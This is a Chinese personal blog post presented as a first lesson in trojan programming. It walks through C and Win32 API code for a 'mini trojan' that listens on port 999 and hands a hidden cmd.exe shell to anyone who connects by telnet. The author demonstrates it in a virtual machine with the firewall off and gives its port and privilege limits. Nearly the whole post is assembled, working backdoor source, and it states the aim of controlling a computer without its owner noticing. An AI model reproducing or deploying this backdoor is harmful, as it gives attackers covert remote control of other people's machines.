<!DOCTYPE html>

<html lang="en">

<head>
  
  <title>从mini木马开始 - 失焦——致所有美好的</title>
  <meta charset="UTF-8">
  <meta name="description" content="">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">
  
  

  <link rel="shortcut icon" href="https://shijoa.github.io/logo.png" type="image/png" />
  <meta name="description" content="以最简单的mini木马开始我们的木马编程学习在开始前，先去复习一下Socket编程如何？">
<meta property="og:type" content="article">
<meta property="og:title" content="从mini木马开始">
<meta property="og:url" content="https://shijoa.github.io/2020/12/08/%E4%BB%8Emini%E6%9C%A8%E9%A9%AC%E5%BC%80%E5%A7%8B/index.html">
<meta property="og:site_name" content="失焦——致所有美好的">
<meta property="og:description" content="以最简单的mini木马开始我们的木马编程学习在开始前，先去复习一下Socket编程如何？">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://shijoa.github.io/2020/12/08/%E4%BB%8Emini%E6%9C%A8%E9%A9%AC%E5%BC%80%E5%A7%8B/open_it.png">
<meta property="og:image" content="https://shijoa.github.io/2020/12/08/%E4%BB%8Emini%E6%9C%A8%E9%A9%AC%E5%BC%80%E5%A7%8B/open_show.png">
<meta property="og:image" content="https://shijoa.github.io/2020/12/08/%E4%BB%8Emini%E6%9C%A8%E9%A9%AC%E5%BC%80%E5%A7%8B/connecting.png">
<meta property="og:image" content="https://shijoa.github.io/2020/12/08/%E4%BB%8Emini%E6%9C%A8%E9%A9%AC%E5%BC%80%E5%A7%8B/connect_success.png">
<meta property="og:image" content="https://shijoa.github.io/2020/12/08/%E4%BB%8Emini%E6%9C%A8%E9%A9%AC%E5%BC%80%E5%A7%8B/give_some_order.png">
<meta property="og:image" content="https://shijoa.github.io/2020/12/08/%E4%BB%8Emini%E6%9C%A8%E9%A9%AC%E5%BC%80%E5%A7%8B/reaction.png">
<meta property="og:image" content="https://shijoa.github.io/2020/12/08/%E4%BB%8Emini%E6%9C%A8%E9%A9%AC%E5%BC%80%E5%A7%8B/999btons.png">
<meta property="article:published_time" content="2020-12-08T02:07:02.000Z">
<meta property="article:modified_time" content="2020-12-29T09:03:21.523Z">
<meta property="article:author" content="ShiJoa">
<meta property="article:tag" content="编程">
<meta property="article:tag" content="安全">
<meta property="article:tag" content="木马">
<meta property="article:tag" content="代码">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://shijoa.github.io/2020/12/08/%E4%BB%8Emini%E6%9C%A8%E9%A9%AC%E5%BC%80%E5%A7%8B/open_it.png">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/combine/npm/highlight.js@9.15.8/styles/atom-one-dark.css,gh/nexmoe/nexmoe.github.io@latest/lib/mdui_043tiny/css/mdui.css,gh/nexmoe/nexmoe.github.io@latest/lib/iconfont/iconfont.css,gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css?v=233" crossorigin>
  
    <link rel="stylesheet" href="//at.alicdn.com/t/font_2260593_qqf95agpakh.css">
  
  <link rel="stylesheet" href="/css/style.css?v=1624862877561">
<meta name="generator" content="Hexo 5.2.0"></head>

<body class="mdui-drawer-body-left">
  
  <div id="nexmoe-background">
    <script src="https://unpkg.com/css-doodle@0.10.0/css-doodle.min.js"></script>
<style>
    css-doodle {
        --rule: (
            :doodle {
                @grid: 50x1 / 100vmin;
                perspective: 50vmin;
            }

            background: @multi(@r(40, 20), (radial-gradient(@p(#53d9d1, #f27b9b, #eb7132) 15%, transparent 50%) @r(100%) @r(100%) / @r(1%, 3%, .1) @lr() no-repeat));

            @size: 150%;
            @place-cell: center;
            animation: scale-up 15s linear infinite;
            animation-delay: calc(@i() * -.4s);

            @keyframes scale-up {
                0% {
                    opacity: 0;
                    transform: translate3d(0, 0, 0) rotate(0);
                }

                10% {
                    opacity: 1;
                }

                95% {
                    transform: translate3d(0, 0, @r(40vmin, 85vmin)) rotate(@r(-360deg, 360deg));
                }

                100% {
                    opacity: 0;
                    transform: translate3d(0, 0, 1vmin);
                }
            }

        );
    }
</style>
<div class="css-doodle">
    <css-doodle use="var(--rule)"></css-doodle>
</div>
    <div class="nexmoe-bg" style="background-image: url(https://shijoa.github.io/background2.jpg)"></div>
    
    <div class="mdui-appbar mdui-shadow-0">
      <div class="mdui-toolbar">
        <a mdui-drawer="{target: '#drawer', swipe: true}" title="menu" class="mdui-btn mdui-btn-icon mdui-ripple"><i class="mdui-icon nexmoefont icon-menu"></i></a>
        <div class="mdui-toolbar-spacer"></div>
        <!--<a href="javascript:;" class="mdui-btn mdui-btn-icon"><i class="mdui-icon material-icons">search</i></a>-->
        <a href="/" title="ShiJoa" class="mdui-btn mdui-btn-icon"><img src="https://shijoa.github.io/logo.png" alt="ShiJoa"></a>
       </div>
    </div>
  </div>
  <div id="nexmoe-header">
      <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="ShiJoa">
            <img src="https://shijoa.github.io/logo.png" alt="ShiJoa" alt="ShiJoa">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>Articles</span>23</div>
        <div><span>Tags</span>15</div>
        <div><span>Categories</span>3</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/" title="首页">
            <i class="mdui-list-item-icon nexmoefont icon-icon_home"></i>
            <div class="mdui-list-item-content">
                首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/archives" title="文章归档">
            <i class="mdui-list-item-icon nexmoefont icon-container"></i>
            <div class="mdui-list-item-content">
                文章归档
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/about.html" title="关于我">
            <i class="mdui-list-item-icon nexmoefont icon-huiyuan"></i>
            <div class="mdui-list-item-content">
                关于我
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/Gallery.html" title="画廊">
            <i class="mdui-list-item-icon nexmoefont icon-pictureframephotopainting"></i>
            <div class="mdui-list-item-content">
                画廊
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/PY.html" title="我的朋友">
            <i class="mdui-list-item-icon nexmoefont icon-fenxiang"></i>
            <div class="mdui-list-item-content">
                我的朋友
            </div>
        </a>
        
    </div>
    <aside id="nexmoe-sidebar">
  
  <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
        <form id="search_form" action_e="https://www.google.com/search?q={shijoa.github.io}}" onsubmit="return search();">
            <label><input id="search_value" name="q" type="search" placeholder="Search"></label>
        </form>
    </div>
</div>
  
  <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-social">
        <a class="mdui-ripple" href="https://qm.qq.com/cgi-bin/qm/qr?k=PPxB90Ek7ypSg_IrhYMeWaHWyTsbmM9B&noverify=0" target="_blank" mdui-tooltip="{content: 'QQ'}" style="color: rgb(249, 174, 8);background-color: rgba(249, 174, 8, .1);">
            <i class="nexmoefont icon-qq"></i>
        </a><a class="mdui-ripple" href="https://space.bilibili.com/19674502" target="_blank" mdui-tooltip="{content: '哔哩哔哩'}" style="color: rgb(231, 106, 141);background-color: rgba(231, 106, 141, .15);">
            <i class="nexmoefont icon-CN_bilibiliB"></i>
        </a><a class="mdui-ripple" href="https://https://github.com/ShiJoa" target="_blank" mdui-tooltip="{content: 'GitHub'}" style="color: rgb(25, 23, 23);background-color: rgba(25, 23, 23, .15);">
            <i class="nexmoefont icon-github"></i>
        </a><a class="mdui-ripple" href="https://www.pixiv.net/users/26561422" target="_blank" mdui-tooltip="{content: 'Pixiv'}" style="color: rgb(3,152,150);background-color: rgba(3,152,150,.15);">
            <i class="nexmoefont icon-DESIGN_Pixiv"></i>
        </a>
    </div>
</div>
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Categories</h3>
    <div class="nexmoe-widget">

      <ul class="category-list">

        


        

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/学习/">学习</a>
          <span class="category-list-count">10</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/生活/">生活</a>
          <span class="category-list-count">3</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/项目/">项目</a>
          <span class="category-list-count">2</span>
        </li>

        
      </ul>

    </div>
  </div>


  
  
  <div class="nexmoe-widget-wrap">
    <div id="randomtagcloud" class="nexmoe-widget tagcloud nexmoe-rainbow">
      <a href="/tags/FLAG/" style="font-size: 10px;">FLAG</a> <a href="/tags/Windows%E5%86%85%E6%A0%B8/" style="font-size: 10px;">Windows内核</a> <a href="/tags/sql%E6%B3%A8%E5%85%A5/" style="font-size: 12px;">sql注入</a> <a href="/tags/%E4%BB%A3%E7%A0%81/" style="font-size: 18px;">代码</a> <a href="/tags/%E5%8D%9A%E5%AE%A2/" style="font-size: 14px;">博客</a> <a href="/tags/%E5%AD%A6%E4%B9%A0/" style="font-size: 14px;">学习</a> <a href="/tags/%E5%AE%89%E5%85%A8/" style="font-size: 18px;">安全</a> <a href="/tags/%E6%95%85%E4%BA%8B/" style="font-size: 12px;">故事</a> <a href="/tags/%E6%9C%A8%E9%A9%AC/" style="font-size: 16px;">木马</a> <a href="/tags/%E7%94%9F%E6%B4%BB/" style="font-size: 12px;">生活</a> <a href="/tags/%E7%94%BB%E7%94%BB/" style="font-size: 12px;">画画</a> <a href="/tags/%E7%B3%BB%E7%BB%9F/" style="font-size: 16px;">系统</a> <a href="/tags/%E7%BC%96%E7%A8%8B/" style="font-size: 20px;">编程</a> <a href="/tags/%E7%BD%91%E7%BB%9C/" style="font-size: 14px;">网络</a> <a href="/tags/%E9%9A%8F%E7%AC%94/" style="font-size: 14px;">随笔</a>
    </div>
    
  </div>

  
  <!--档案室Archive-->

  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Archive</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/">2021</a><span class="archive-list-count">10</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/">2020</a><span class="archive-list-count">13</span></li></ul>
    </div>
  </div>


<style>
.nexmoe-widget .archive-list-count{
	position : absolute;
	right: 15px;
	top:9px;
	color: #DDD;
}
</style>

  
</aside>
    <div class="nexmoe-copyright">
        &copy; 2021 ShiJoa
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://github.com/theme-nexmoe/hexo-theme-nexmoe" target="_blank">Nexmoe</a>
    </div>
</div><!-- .nexmoe-drawer -->
  </div>
  <div id="nexmoe-content">
    <div class="nexmoe-primary">
        <div class="nexmoe-post">
  
      <div class="nexmoe-post-cover" style="padding-bottom: 68.33333333333333%;"> 
          <img data-src="https://shijoa.github.io/background2.jpg" data-sizes="auto" alt="从mini木马开始" class="lazyload">
          <h1>从mini木马开始</h1>
      </div>
  
  
  <div class="nexmoe-post-meta nexmoe-rainbow" style="margin:10px 0!important;">
    <a><i class="nexmoefont icon-calendar-fill"></i>2020年12月08日</a>
    <a><i class="nexmoefont icon-areachart"></i>2,485 字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>大概 9 分钟</a>
</div>

  <div class="nexmoe-post-right">
    
      <div class="nexmoe-fixed">
        <div class="nexmoe-valign">
            <div class="nexmoe-toc">
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#MiNi%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.</span> <span class="toc-text">MiNi木马</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%98%E9%87%8F"><span class="toc-number">1.1.</span> <span class="toc-text">变量</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%9D%E5%A7%8B%E5%8C%96%E5%86%85%E5%AD%98"><span class="toc-number">1.2.</span> <span class="toc-text">初始化内存</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96CMD%E8%B7%AF%E5%BE%84"><span class="toc-number">1.3.</span> <span class="toc-text">获取CMD路径</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8A%A0%E8%BD%BDws2-32-dll"><span class="toc-number">1.4.</span> <span class="toc-text">加载ws2_32.dll</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%BE%E7%BD%AE%E6%9C%AC%E5%9C%B0%E4%BF%A1%E6%81%AF%E5%92%8C%E7%BB%91%E5%AE%9A%E5%8D%8F%E8%AE%AE%EF%BC%8C%E5%BB%BA%E7%AB%8BSocket"><span class="toc-number">1.5.</span> <span class="toc-text">设置本地信息和绑定协议，建立Socket</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%BE%E5%AE%9A%E6%9C%AC%E5%9C%B0%E4%BF%A1%E6%81%AF%E5%92%8C%E7%BB%91%E5%AE%9A%E5%8D%8F%E8%AE%AE"><span class="toc-number">1.6.</span> <span class="toc-text">设定本地信息和绑定协议</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BB%BA%E7%AB%8BSocket%E2%80%94%E2%80%94%E2%80%94%E2%80%94socket"><span class="toc-number">1.7.</span> <span class="toc-text">建立Socket————socket()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%BE%E7%BD%AE%E7%BB%91%E5%AE%9A%E7%AB%AF%E5%8F%A3%E2%80%94%E2%80%94%E2%80%94%E2%80%94bind"><span class="toc-number">1.8.</span> <span class="toc-text">设置绑定端口————bind()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%BE%E7%BD%AE%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9B%91%E5%90%AC%E7%AB%AF%E5%8F%A3%EF%BC%9A"><span class="toc-number">1.9.</span> <span class="toc-text">设置服务器监听端口：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%80%E5%A7%8B%E8%BF%9E%E6%8E%A5%E8%BF%9C%E7%A8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8%EF%BC%8C%E5%B9%B6%E9%85%8D%E7%BD%AE%E9%9A%90%E8%97%8F%E7%AA%97%E5%8F%A3%E7%BB%93%E6%9E%84%E4%BD%93%EF%BC%9A"><span class="toc-number">1.10.</span> <span class="toc-text">开始连接远程服务器，并配置隐藏窗口结构体：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E5%8C%BF%E5%90%8D%E9%80%9A%E9%81%93"><span class="toc-number">1.11.</span> <span class="toc-text">创建匿名通道</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AD%89%E5%BE%85%E8%BF%9E%E6%8E%A5"><span class="toc-number">1.12.</span> <span class="toc-text">等待连接</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%80%9A%E4%BF%A1%E5%AE%8C%E6%88%90%EF%BC%8C%E5%85%B3%E9%97%AD%E8%BF%9B%E7%A8%8B%E5%92%8C%E5%A5%97%E6%8E%A5%E5%AD%97"><span class="toc-number">1.13.</span> <span class="toc-text">通信完成，关闭进程和套接字</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%B8%E8%BD%BDws2-32-dll%EF%BC%8C%E5%85%B3%E9%97%AD%E8%BF%9E%E6%8E%A5"><span class="toc-number">1.14.</span> <span class="toc-text">卸载ws2_32.dll，关闭连接</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B5%8B%E8%AF%95"><span class="toc-number">2.</span> <span class="toc-text">测试</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">3.</span> <span class="toc-text">分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%B1%E7%82%B9"><span class="toc-number">3.1.</span> <span class="toc-text">弱点</span></a></li></ol></li></ol>
            </div>
        </div>
      </div>
    
  </div>

  <article>
    <p>以最简单的mini木马开始我们的木马编程学习<br>在开始前，先去复习一下<a href="https://shijoa.github.io/2020/12/09/Socket%E7%BC%96%E7%A8%8B/">Socket编程</a>如何？</p>
<a id="more"></a>

<p>木马的本质上正如其名，在看似无害的外表下隐藏致命的利剑。<br>所以木马应该在被入侵的计算机主任没有意识的状况下控制计算机。</p>
<h1 id="MiNi木马"><a href="#MiNi木马" class="headerlink" title="MiNi木马"></a>MiNi木马</h1><p>mini木马实现了一个木马最基本的功能，开启后会打开计算机的一个端口，允许外部计算机以当前用户的权限远程通过Telnet控制计算机<br>主要的操作顺序为</p>
<ul>
<li>初始化内存</li>
<li>获取CMD路径</li>
<li>加载ws2_32.dll</li>
<li>建立Socket套接字</li>
<li>设置绑定端口</li>
<li>设置服务器监听端口</li>
<li>连接远程服务器</li>
<li>配置隐藏窗口结构体</li>
<li>创建匿名通道</li>
<li>等待连接</li>
<li>通信结束，结束程序</li>
</ul>
<h2 id="变量"><a href="#变量" class="headerlink" title="变量"></a>变量</h2><pre><code>WSADATA WSADa;
sockaddr_in SockAddrIn;
SOCKET CSocket, SSocket;
int iAddrSize;
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;</code></pre>
<h2 id="初始化内存"><a href="#初始化内存" class="headerlink" title="初始化内存"></a>初始化内存</h2><p>这一步没什么太多可讲的，<br>使用ZeroMemory()清空重要变量的内容</p>
<pre><code>ZeroMemory(&amp;ProcessInfo, sizeof(ProcessInfo));
ZeroMemory(&amp;StartupInfo, sizeof(StartupInfo));
ZeroMemory(&amp;WSADa, sizeof(WSADa));</code></pre>
<h2 id="获取CMD路径"><a href="#获取CMD路径" class="headerlink" title="获取CMD路径"></a>获取CMD路径</h2><p>获取环境变量值COMSPEC————即CMD</p>
<pre><code>GetEnvironmentVariable(L&quot;COMSPEC&quot;, szCMDPath, sizeof(szCMDPath))</code></pre>
<h2 id="加载ws2-32-dll"><a href="#加载ws2-32-dll" class="headerlink" title="加载ws2_32.dll"></a>加载ws2_32.dll</h2><p>ws2_32.dll这是以后我们会经常用到的动态链接库对应的是Win32 API编程，以后会详细讲</p>
<pre><code>WSAStartup(0x0202, &amp;WSADa);</code></pre>
<h2 id="设置本地信息和绑定协议，建立Socket"><a href="#设置本地信息和绑定协议，建立Socket" class="headerlink" title="设置本地信息和绑定协议，建立Socket"></a>设置本地信息和绑定协议，建立Socket</h2><p>本木马属于TCP访问，所以使用流式套接字(SOCK_STREAM)<br>详细说明可参考我的<img data-fancybox="gallery" data-sizes="auto" data-src="" alt="Socket编程" class="lazyload"></p>
<h2 id="设定本地信息和绑定协议"><a href="#设定本地信息和绑定协议" class="headerlink" title="设定本地信息和绑定协议"></a>设定本地信息和绑定协议</h2><pre><code>SockAddrIn.sin_family = AF_INET;
SockAddrIn.sin_addr.s_addr = INADDR_ANY;
SockAddrIn.sin_port = htons(MasterPort);</code></pre>
<h2 id="建立Socket————socket"><a href="#建立Socket————socket" class="headerlink" title="建立Socket————socket()"></a>建立Socket————socket()</h2><pre><code>CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);</code></pre>
<p>WSASocket()函数原型：</p>
<pre><code>SOCKET WSASocket (
int af, 
int type, 
int protocol, 
LPWSAPROTOCOL_INFO lpProtocolInfo, 
GROUP g, 
DWORD dwFlags 
);</code></pre>
<p>参数说明：<br>af：[in]一个地址族规范。仅支持AF_INET格式，亦即ARPA Internet地址格式。<br>type：新套接口的类型描述。<br>protocol：套接口使用的特定协议，如果调用者不愿指定协议则定为0。<br>lpProtocolInfo：一个指向PROTOCOL_INFO结构的指针，该结构定义所创建套接口的特性。如果本参数非零，则前三个参数（af, type, protocol）被忽略。<br>g：保留给未来使用的套接字组。套接口组的标识符。<br>iFlags：套接口属性描述。</p>
<h2 id="设置绑定端口————bind"><a href="#设置绑定端口————bind" class="headerlink" title="设置绑定端口————bind()"></a>设置绑定端口————bind()</h2><pre><code>bind(CSocket, (sockaddr*)&amp;SockAddrIn, sizeof(SockAddrIn));</code></pre>
<h2 id="设置服务器监听端口："><a href="#设置服务器监听端口：" class="headerlink" title="设置服务器监听端口："></a>设置服务器监听端口：</h2><pre><code>listen(CSocket, 1);
iAddrSize = sizeof(SockAddrIn);</code></pre>
<h2 id="开始连接远程服务器，并配置隐藏窗口结构体："><a href="#开始连接远程服务器，并配置隐藏窗口结构体：" class="headerlink" title="开始连接远程服务器，并配置隐藏窗口结构体："></a>开始连接远程服务器，并配置隐藏窗口结构体：</h2><pre><code>SSocket = accept(CSocket, (sockaddr*)&amp;SockAddrIn, &amp;iAddrSize);
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow = SW_HIDE;                                  //窗口显示属性改为隐藏
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)SSocket;
StartupInfo.hStdOutput = (HANDLE)SSocket;
StartupInfo.hStdError = (HANDLE)SSocket;</code></pre>
<p>STARTUPINFO StarupInfoz 这一结构体的原型：<br>    typedef struct _STARTUPINFO<br>    {<br>     DWORD cb;             //包含STARTUPINFO结构中的字节数.如果Microsoft将来扩展该结构,它可用作版本控制手段.应用程序必须将cb初始化为sizeof ( STARTUPINFO )<br>     PSTR lpReserved;       //保留。必须初始化为N U L L<br>     PSTR lpDesktop;     //用于标识启动应用程序所在的桌面的名字。如果该桌面存在，新进程便与指定的桌面相关联。如果桌面不存在，便创建一个带有默认属性的桌面，并使用为新进程指定的名字。    如果lpDesktop是NULL（这是最常见的情况 ),那么该进程将与当前桌面相关联<br>     PSTR lpTitle;     //用于设定控制台窗口的名称。如果l p Ti t l e 是N U L L ，则可执行文件的名字将用作窗口名<br>     DWORD dwX;       //用于设定应用程序窗口在屏幕上应该放置的位置的x 和y 坐标（以像素为单位）。<br>     DWORD dwY;       //只有当子进程用CW_USEDEFAULT作为CreateWindow的x参数来创建它的第一个重叠窗口时,    才使用这两个坐标。若是创建控制台窗口的应用程序，这些成员用于指明控制台窗口的左上角 </p>
<pre><code> DWORD dwXSize;   //用于设定应用程序窗口的宽度和长度（以像素为单位）只有dwYsize 
 DWORD dwYSize;   // 当子进程将CW_USEDEFAULT 用作CreateWindow 的nWidth参数来创建它的第一个重叠窗口时，才使用这些值。若是创建控制台窗口的应用程序，这些成员将用于指明控制台窗口的宽度 
 DWORD dwXCountChars;   //用于设定子应用程序的控制台窗口的宽度和高度（以字符为单位） 
 DWORD dwYCountChars; 
 DWORD dwFillAttribute;   //用于设定子应用程序的控制台窗口使用的文本和背景颜色 
 DWORD dwFlags;           //请参见下一段
                                STARTF_USESIZE                  // 使用dwXSize 和dwYSize 成员 
                                STARTF_USESHOWWINDOW            //使用wShowWindow 成员 
                                STARTF_USEPOSITION              //使用dwX 和dwY 成员 
                                STARTF_USECOUNTCHARS            //使用dwXCountChars 和dwYCount Chars 成员 
                                STARTF_USEFILLATTRIBUTE         //使用dwFillAttribute 成员 
                                STARTF_USESTDHANDLES            //使用hStdInput 、hStdOutput 和hStdError 成员 
                                STARTF_RUN_FULLSCREEN           //强制在x86 计算机上运行的控制台应用程序以全屏幕方式启动运行
 WORD wShowWindow;         //用于设定如果子应用程序初次调用的ShowWindow 将SW_SHOWDEFAULT 作为    nCmdShow 参数传递时，该应用程序的第一个重叠窗口应该如何出现。本成员可以是通常用于ShowWindow 函数的任何一个SW_*标识符 
 WORD cbReserved2;         //保留。必须被初始化为0 
 PBYTE lpReserved2;       //保留。必须被初始化为N U L L 
 HANDLE hStdInput;         //用于设定供控制台输入和输出用的缓存的句柄。按照默认设置，hStdInput 用于标识键盘缓存，hStdOutput 和hStdError用于标识控制台窗口的缓存 
 HANDLE hStdOutput; 
 HANDLE hStdError; 
&#125; STARTUPINFO, *LPSTARTUPINFO;*/</code></pre>
<h2 id="创建匿名通道"><a href="#创建匿名通道" class="headerlink" title="创建匿名通道"></a>创建匿名通道</h2><pre><code>CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &amp;StartupInfo, &amp;ProcessInfo);</code></pre>
<p>BOOL CreateProcess() 函数原型：<br>    BOOL CreateProcess<br>    (<br>    LPCTSTR lpApplicationName,<br>    LPTSTR lpCommandLine,<br>    LPSECURITY_ATTRIBUTES lpProcessAttributes。<br>    LPSECURITY_ATTRIBUTES lpThreadAttributes,<br>    BOOL bInheritHandles,<br>    DWORD dwCreationFlags,<br>    LPVOID lpEnvironment,<br>    LPCTSTR lpCurrentDirectory,<br>    LPSTARTUPINFO lpStartupInfo,<br>    LPPROCESS_INFORMATION lpProcessInformation<br>    )</p>
<p>LPCTSTR lpApplicationName:<br>指向一个NULL结尾的、用来指定可执行模块的字符串。<br>这个字符串可以是可执行模块的绝对路径，也可以是相对路径，在后一种情况下，函数使用当前驱动器和目录建立可执行模块的路径。<br>这个参数可以被设为NULL，在这种情况下，可执行模块的名字必须处于 lpCommandLine 参数最前面并由空格符与后面的字符分开。<br>一般都设为NULL</p>
<p>LPTSTR lpCommandLine：<br>指向一个以NULL结尾的字符串，该字符串指定要执行的命令行。<br>这个参数可以为空，那么函数将使用lpApplicationName参数指定的字符串当做要运行的程序的命令行。<br>如果lpApplicationName和lpCommandLine参数都不为空，那么lpApplicationName参数指定将要被运行的模块，lpCommandLine参数指定将被运行的模块的命令行。<br>新运行的进程可以使用GetCommandLine函数获得整个命令行。C语言程序可以使用argc和argv参数。</p>
<p>LPSECURITY_ATTRIBUTES lpProcessAttributes：<br>指向一个SECURITY_ATTRIBUTES结构体，这个结构体决定是否返回的句柄可以被子进程继承。<br>如果lpProcessAttributes参数为空（NULL），那么句柄不能被继承。<br>在Windows NT中：SECURITY_ATTRIBUTES结构的lpSecurityDescriptor成员指定了新进程的安全描述符，如果参数为空，新进程使用默认的安全描述符。</p>
<p>LPSECURITY_ATTRIBUTES lpThreadAttributes：<br>同lpProcessAttribute,不过这个参数决定的是线程是否被继承.通常置为NULL.</p>
<p>BOOL bInheritHandles<br>指示新进程是否从调用进程处继承了句柄。<br>如果参数的值为真，调用进程中的每一个可继承的打开句柄都将被子进程继承。被继承的句柄与原进程拥有完全相同的值和访问权限。</p>
<p>DWORD dwCreationFlags:<br>控制新进程的优先类，优先类用来决定此进程的线程调度的优先级。</p>
<p>LPVOID lpEnvironment:<br>指向一个新进程的环境块。如果此参数为空，新进程使用调用进程的环境。</p>
<p>LPCTSTR lpCurrentDirectory:<br>指向一个以NULL结尾的字符串，这个字符串用来指定子进程的工作路径。<br>这个字符串必须是一个包含驱动器名的绝对路径。<br>如果这个参数为空，新进程将使用与调用进程相同的驱动器和目录。这个选项是一个需要启动应用程序并指定它们的驱动器和工作目录的外壳程序的主要条件。</p>
<p>LPSTARTUPINFO lpStartupInfo:<br>指向一个用于决定新进程的主窗体如何显示的STARTUPINFO结构体。</p>
<p>lpProcessInformation:<br>指向一个用来接收新进程的识别信息的PROCESS_INFORMATION结构体。</p>
<h2 id="等待连接"><a href="#等待连接" class="headerlink" title="等待连接"></a>等待连接</h2><pre><code>WaitForSingleObject(ProcessInfo.hProcess, INFINITE);</code></pre>
<p>WaitForSingleObject()函数原型：<br>    DWORD WINAPI WaitForSingleObject(<br>    __in HANDLE hHandle,<br>    __in DWORD dwMilliseconds<br>    );</p>
<p>hHandle:指定进程<br>dwMilliseconds：有两个具有特殊意义的值————0和INFINITE。若为0，则该函数立即返回；若为INFINITE，则线程一直被挂起，直到hHandle所指向的对象变为有信号状态时为止。</p>
<h2 id="通信完成，关闭进程和套接字"><a href="#通信完成，关闭进程和套接字" class="headerlink" title="通信完成，关闭进程和套接字"></a>通信完成，关闭进程和套接字</h2><pre><code>CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
closesocket(CSocket);
closesocket(SSocket);</code></pre>
<h2 id="卸载ws2-32-dll，关闭连接"><a href="#卸载ws2-32-dll，关闭连接" class="headerlink" title="卸载ws2_32.dll，关闭连接"></a>卸载ws2_32.dll，关闭连接</h2><pre><code>WSACleanup();</code></pre>
<h1 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h1><p>让我们直接双击运行编译好的mini木马程序<br><img src="open_it.png"><br><strong>当然是用虚拟机来跑啦，小傻瓜！</strong><br>记得要关虚拟机防火墙<br><img src="open_show.png"></p>
<p>接着我们可以直接在真实机启动Telnet服务去连接已经中招的虚拟机<br>输入：<br>    telnet [ip] [端口号]</p>
<p>在这里，mini木马的端口号是999<br><img src="connecting.png"></p>
<p>跳出新窗口，连接成功！<br><img src="connect_success.png"></p>
<p>随便来点操作，比如在桌面建立文件夹123<br><img src="give_some_order.png"></p>
<p>回来看虚拟机，已经建立了对应文件夹啦<br><img src="reaction.png"></p>
<p>至此我们完全可以说，这台电脑已经被控制了。</p>
<h1 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h1><p>通过查看虚拟机里的开放端口，我们可以看到mini木马在虚拟机打开了999端口<br><img src="999btons.png"></p>
<h2 id="弱点"><a href="#弱点" class="headerlink" title="弱点"></a>弱点</h2><p>mini木马只能使用当前打开此木马的用户的权限进行操作，所以如果用户权限做得好，mini木马做不了什么事，当然，以此为踏板进行其他操作，获取更高的权限是可以的<br>minin木马能够被防火墙拦截，所以就现在来说能够做到的事情有限。</p>

  </article>

  
    
  <div class="nexmoe-post-copyright">
    <strong>Author：</strong>ShiJoa<br>
